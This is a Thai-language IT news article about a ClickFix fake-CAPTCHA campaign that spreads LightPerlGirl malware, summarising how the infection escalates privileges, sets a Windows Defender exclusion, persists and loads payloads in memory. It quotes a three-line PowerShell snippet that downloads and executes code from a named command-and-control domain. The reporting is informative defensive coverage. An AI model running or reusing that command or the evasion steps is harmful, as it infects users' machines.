ดาวน์โหลดโปรแกรมฟรี
       
   สมัครสมาชิก   เข้าสู่ระบบ
ข่าวไอที
 

วิธีหลอกลวงแห่งปี !? ClickFix ฮิตไม่เลิก รอบนี้ปล่อยมัลแวร์ LightPerlGirl ฝังลงเครื่องเหยื่อ

วิธีหลอกลวงแห่งปี !? ClickFix ฮิตไม่เลิก รอบนี้ปล่อยมัลแวร์ LightPerlGirl  ฝังลงเครื่องเหยื่อ
ภาพจาก : https://sublime.security/blog/detecting-an-email-based-clickfix-attack-that-delivers-dcrat-malware-payload/
เมื่อ :
|  ผู้เข้าชม : 750
เขียนโดย :
0 %E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%AB%E0%B8%A5%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%A7%E0%B8%87%E0%B9%81%E0%B8%AB%E0%B9%88%E0%B8%87%E0%B8%9B%E0%B8%B5+%21%3F+ClickFix+%E0%B8%AE%E0%B8%B4%E0%B8%95%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B9%80%E0%B8%A5%E0%B8%B4%E0%B8%81+%E0%B8%A3%E0%B8%AD%E0%B8%9A%E0%B8%99%E0%B8%B5%E0%B9%89%E0%B8%9B%E0%B8%A5%E0%B9%88%E0%B8%AD%E0%B8%A2%E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C+LightPerlGirl++%E0%B8%9D%E0%B8%B1%E0%B8%87%E0%B8%A5%E0%B8%87%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A2%E0%B8%B7%E0%B9%88%E0%B8%AD
A- A+
แชร์หน้าเว็บนี้ :

การหลอกล่อให้เหยื่อทำการติดตั้งมัลแวร์ลงเครื่องนั้น เรียกได้ว่ามีหลากหลายวิธี โดยวิธีหนึ่งที่กำลังมาแรงในปัจจุบันคือ การใช้คำสั่งบนหน้าจอเพจปลอมหลอกให้เยอะต้องทำตามขั้นตอนเพื่อแก้ปัญหาที่เกิดขึ้น แท้จริงแล้วเป็นการติดตั้งมัลแวร์ โดยวิธีการดังกล่าวนั้นเรียกว่า ClickFix และข่าวนี้ก็เป็นอีกหนึ่งข่าวที่มีการแพร่กระจายมัลแวร์ด้วยวิธีการดังกล่าว

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญ ClickFix ตัวใหม่ เพื่อใช้ในการแพร่กระจายมัลแวร์ที่มีชื่อว่า LightPerlGirl โดยแคมเปญนี้จะเป็นการที่เหยื่อเข้าสู่เว็บไซต์ปกติทั่วไปที่ถูกแฮกเกอร์ทำการเข้ายึดครองปรับเปลี่ยนสคริปท์ภายในด้วยการสอดแทรกโค้ดในรูปแบบ JavaScript ที่หลังจากที่สคริปท์ทำงานแล้ว จะเป็นการแสดง Captcha ปลอมซึ่งมีการสั่งให้เหยื่อทำตามที่ตัว Captcha สั่งให้ทำโดยอ้างว่าเป็นการทำเพื่อยืนยันตัวตนผู้ใช้งาน โดยตัว Captcha นั้นจะสั่งให้เหยื่อทำการกดปุ่มโลโก้ Windows และปุ่ม R เพื่อเปิดฟีเจอร์รันขึ้นมา ซึ่งในระหว่างนี้ตัวสคริปท์จะทำการคัดลอกโค้ดสำหรับการรันและดาวน์โหลดมัลแวร์ไว้เป็นที่เรียบร้อยแล้ว ดังนั้น สคริปท์ในขั้นถัดไปจะเป็นการสั่งให้เหยื่อทำการกดปุ่ม CTRL+V เพื่อวางตัวโค้ดลงบน Run และกด Enter เพื่อให้ตัวระบบนำไปสู่การดาวน์โหลด และรันติดตั้งมัลแวร์ดังกล่าวลงสู่เครื่อง

บทความเกี่ยวกับ Hacker อื่นๆ

วิธีหลอกลวงแห่งปี !? ClickFix ฮิตไม่เลิก รอบนี้ปล่อยมัลแวร์ LightPerlGirl  ฝังลงเครื่องเหยื่อ
ภาพจาก: https://cybersecuritynews.com/beware-of-fake-captcha-that-installs-lightperlgirl-malware/

สำหรับตัวมัลแวร์ LightPerlGirl นั้นเป็นมัลแวร์ที่มาในรูปแบบของการติดตั้งแบบหลากขั้นหลายขั้นตอน (Multi-Stage Infection) โดยตัวชุดคำสั่ง PowerShell ตัวแรกที่ถูกรันขึ้นในขั้นตอน ClickFix นั้น จะเต็มไปด้วยโค้ดสำหรับการตีรวนระบบเพื่อให้ระบบป้องกันไม่สามารถจับได้ (Obfuscation) ซึ่งเมื่อมีการทำความสะอาดตัวโค้ดระหว่างการวิเคราะห์โดยทีมวิจัยออกไป ก็ได้พบว่าโค้ดดังกล่าวนั้นมีไว้เพื่อการติดต่อสื่อสารกับตัวเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ซึ่งถูกตั้งอยู่ที่ URL (cmbkz8kz1000108k2carjewzf[.]info) โดยตัวโค้ดนั้นจะมีลักษณะดังนี้

$rbld30 = 'cmbkz8kz1000108k2carjewzf.info';

$vnrl01 = Invoke-RestMethod -Uri $rbld30; 

Invoke-Expression $vnrl01

หลังจากที่ตัวมัลแวร์ทำการติดต่อกับเซิร์ฟเวอร์เป็นที่เรียบร้อยแล้ว ก็จะทำการดาวน์โหลด JavaScript ตัวที่สองลงมารันบนเครื่อง โดยตัวสคริปท์นั้นจะมีองค์กรประกอบสำคัญ 3 อย่างคือ HelpIO, Urex, และ ExWpL ซึ่งแต่ละตัวนั้นจะทำหน้าที่ต่างกันดังนี้

  • HelpIO จะเป็นตัวจัดการกระบวนการทั้งหมด (Orchestrator) โดยเครื่องมือตัวนี้จะทำการเข้าอัปเกรดสิทธิ์การใช้งานขึ้นเป็นระดับผู้ดูแล (Admin หรือ Administrator) ผ่านทาง User Account Control นอกจากนั้นแล้วตัวเครื่องมือยังมีการเพิ่มรายชื่อของโฟลเดอร์ที่ตัวมัลแวร์ใช้งาน (C:WindowsTemp) ลงไปยังรายชื่อยกเว้น (Exclusion List) ของตัว Windows Defender อีกด้วย
  • Urex จะเริ่มทำงานหลังจากที่สิทธิ์ในการเข้าถึงได้ถึงระดับ Admin แล้ว โดยตัวเครื่องมือจะทำการสร้างความคงทนของตัวมัลแวร์ในระบบ (Persistence) เพื่อให้มั่นใจว่าตัวมัลแวร์จะสามารถรันในระบบได้ตลอดเวลา ด้วยการดาวน์โหลดไฟล์ Batch ลงมาจากเซิร์ฟเวอร์ C2 แล้วทำการวางไฟล์ที่ดาวน์โหลดมาภายใต้ชื่อ LixPay.bat ลงไปยังโฟลเดอร์ที่ถูกยกเว้นจากการตรวจสอบตามขั้นตอนที่ผ่านมา
  • ExWpL จะทำงานต่อ ด้วยการทำหน้าที่ดาวน์โหลดมัลแวร์ตัวจริง (Payload) ลงมาติดตั้งบนเครื่องของเหยื่อในแบบการติดตั้งแบบไร้ไฟล์ (Fileless) ผ่านทาง .NET Reflection ซึ่งจะเป็นการดาวน์โหลดชุดโค้ดที่ถูกเข้ารหัสในรูปแบบ Base-64 .Net Assembly ลงมาบนหน่วยความจำโดยตรงโดยไม่ต้องทำการบันทึกลงบนไดร์ฟ ซึ่งจะทำให้การตรวจสอบมัลแวร์แบบดั้งเดิมที่เน้นการตรวจสอบไฟล์ทำได้ยาก ทำให้การติดตั้งมัลแวร์ลงสู่เครื่องนั้นค่อนข้างไร้ร่องรอยในการตรวจสอบ

ทั้งนี้ ทางแหล่งข่าวไม่ได้ให้ข้อมูลไว้ว่า ตัวมัลแวร์ดังกล่าวนี้เป็นมัลแวร์ประเภทใด และจะส่งผลต่อเครื่องที่ถูกฝังลงอย่างไร


ที่มา : cybersecuritynews.com

0 %E0%B8%A7%E0%B8%B4%E0%B8%98%E0%B8%B5%E0%B8%AB%E0%B8%A5%E0%B8%AD%E0%B8%81%E0%B8%A5%E0%B8%A7%E0%B8%87%E0%B9%81%E0%B8%AB%E0%B9%88%E0%B8%87%E0%B8%9B%E0%B8%B5+%21%3F+ClickFix+%E0%B8%AE%E0%B8%B4%E0%B8%95%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B9%80%E0%B8%A5%E0%B8%B4%E0%B8%81+%E0%B8%A3%E0%B8%AD%E0%B8%9A%E0%B8%99%E0%B8%B5%E0%B9%89%E0%B8%9B%E0%B8%A5%E0%B9%88%E0%B8%AD%E0%B8%A2%E0%B8%A1%E0%B8%B1%E0%B8%A5%E0%B9%81%E0%B8%A7%E0%B8%A3%E0%B9%8C+LightPerlGirl++%E0%B8%9D%E0%B8%B1%E0%B8%87%E0%B8%A5%E0%B8%87%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%AB%E0%B8%A2%E0%B8%B7%E0%B9%88%E0%B8%AD
แชร์หน้าเว็บนี้ :
Keyword คำสำคัญ »
เขียนโดย
นักเขียน : Editor    นักเขียน
 
 
 

ข่าวไอทีที่เกี่ยวข้อง

 


 

แสดงความคิดเห็น